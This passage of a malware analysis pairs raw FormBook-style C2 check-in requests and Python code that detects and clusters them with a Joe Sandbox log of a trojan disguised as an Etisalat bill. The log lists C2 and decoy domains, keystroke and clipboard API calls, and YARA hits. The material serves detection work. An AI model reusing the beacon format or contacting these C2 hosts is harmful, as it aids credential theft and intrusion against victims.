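    "GET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1\r\n"
    "Host: www.1wxir.com\r\nConnection: close\r\n\r\n",
    "GET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1\r\n"
    "Host: www.myconc.pro\r\nConnection: close\r\n\r\n",
]
C2 = "www.1wxir.com/da29/"  # from the extracted configuration on this page

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, host, path, params, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split the query by hand: urllib's parse_qsl would turn '+' into a space
    # and corrupt the base64-like blob.
    params = dict(p.split("=", 1) if "=" in p else (p, "")
                  for p in query.split("&") if p)
    return {"method": method, "host": headers.get("host", ""), "path": path,
            "params": params, "headers": headers, "body": body}


def is_formbook_like(req):
    """Shape observed in this report: a GET to a short campaign directory with
    exactly two parameters, one short alphanumeric token and one longer
    base64-like blob, 'Connection: close' and no User-Agent header."""
    if req["method"] != "GET" or not re.fullmatch(r"/[A-Za-z0-9]{2,8}/", req["path"]):
        return False
    values = list(req["params"].values())
    if len(values) != 2:
        return False
    blobs = [v for v in values if B64_BLOB.fullmatch(v)]
    tokens = [v for v in values if v.isalnum() and len(v) <= 12]
    return (len(blobs) == 1 and len(tokens) == 1
            and req["headers"].get("connection", "").lower() == "close"
            and "user-agent" not in req["headers"])


def cluster_checkins(raw_requests):
    """Group check-ins by (campaign path, constant token); the hosts in each
    group are the decoys and the real C2 one bot rotated through."""
    groups = defaultdict(list)
    for req in map(parse_request, raw_requests):
        if is_formbook_like(req):
            token = next(v for v in req["params"].values() if v.isalnum() and len(v) <= 12)
            groups[(req["path"], token)].append(req["host"])
    return dict(groups)


def split_real_and_decoy(hosts, c2_url):
    """Hosts matching the configured C2 hostname are real; the rest are decoys."""
    c2_host = c2_url.split("/", 1)[0]
    real = [h for h in hosts if h == c2_host]
    return real, [h for h in hosts if h != c2_host]


if __name__ == "__main__":
    for (path, token), hosts in cluster_checkins(REQUESTS).items():
        real, decoys = split_real_and_decoy(hosts, C2)
        print(f"{path} token={token}: real={real} decoys={decoys}")
```

The grouping key is what survives a hostname change: when the operator registers a new real C2 for the same campaign, the path and the constant token stay, so an alert on the (path, token) pair keeps firing while a plain domain blocklist goes stale.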
Source: Joe Sandbox View | IP Address: 103.224.212.212
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 190.115.24.78
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: DDOS-GUARDCORPBZ
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: ZAPPIE-HOST-ASZappieHostGB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BD25E2
          Source: global trafficDNS traffic detected: DNS query: www.usedata.monster
          Source: global trafficDNS traffic detected: DNS query: www.vietcadao.com
          Source: global trafficDNS traffic detected: DNS query: www.micheleditrana.com
          Source: global trafficDNS traffic detected: DNS query: www.aerotyneholdings.com
          Source: global trafficDNS traffic detected: DNS query: www.1wxir.com
          Source: global trafficDNS traffic detected: DNS query: www.rlyadventures.com
          Source: global trafficDNS traffic detected: DNS query: www.myconc.pro
          Source: global trafficDNS traffic detected: DNS query: www.flickzbiz.fun
          Source: global trafficDNS traffic detected: DNS query: www.openshiftstore.com
          Source: global trafficDNS traffic detected: DNS query: www.sercettopper.com
          Source: global trafficDNS traffic detected: DNS query: www.kas-travel.com
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000002.4435480864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000002.4439072490.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439468324.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4439499553.0000000008890000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1wxir.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1wxir.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1wxir.com/da29/www.rlyadventures.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1wxir.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.953700958.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.953700958.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.953700958.com/da29/www.iransarafan.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.953700958.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aerotyneholdings.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aerotyneholdings.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aerotyneholdings.com/da29/www.1wxir.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aerotyneholdings.comReferer:
          Source: explorer.exe, 00000003.00000003.3096473322.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096473322.000000000C861000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cucinaconestilo.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cucinaconestilo.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cucinaconestilo.com/da29/e
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cucinaconestilo.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.flickzbiz.fun
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.flickzbiz.fun/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.flickzbiz.fun/da29/www.openshiftstore.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.flickzbiz.funReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iransarafan.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iransarafan.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iransarafan.com/da29/www.cucinaconestilo.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iransarafan.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kas-travel.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kas-travel.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kas-travel.com/da29/www.mediatechnologysolutions.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kas-travel.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mediatechnologysolutions.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mediatechnologysolutions.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mediatechnologysolutions.com/da29/www.953700958.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.mediatechnologysolutions.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.micheleditrana.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.micheleditrana.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.micheleditrana.com/da29/www.aerotyneholdings.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.micheleditrana.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myconc.pro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myconc.pro/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myconc.pro/da29/www.flickzbiz.fun
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.myconc.proReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.openshiftstore.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.openshiftstore.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.openshiftstore.com/da29/www.veriosg.xyz
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.openshiftstore.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rlyadventures.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rlyadventures.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rlyadventures.com/da29/www.myconc.pro
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.rlyadventures.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sercettopper.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sercettopper.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sercettopper.com/da29/www.kas-travel.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sercettopper.comReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.usedata.monster
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.usedata.monster/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.usedata.monster/da29/www.vietcadao.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.usedata.monsterReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.veriosg.xyz
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.veriosg.xyz/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.veriosg.xyz/da29/www.sercettopper.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.veriosg.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.vietcadao.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.vietcadao.com/da29/
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.vietcadao.com/da29/www.micheleditrana.com
          Source: explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.vietcadao.comReferer:
          Source: explorer.exe, 00000003.00000000.1996092451.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4441907247.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1987574509.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4438237252.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1987574509.0000000007637000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4437215636.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1985931630.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096934333.00000000035FA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097350645.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4440374748.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.4440413157.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000002.4441907247.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1996092451.000000000C460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BD425A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BD4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BD4458
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BC0219
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BECDAC

          E-Banking Fraud

          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
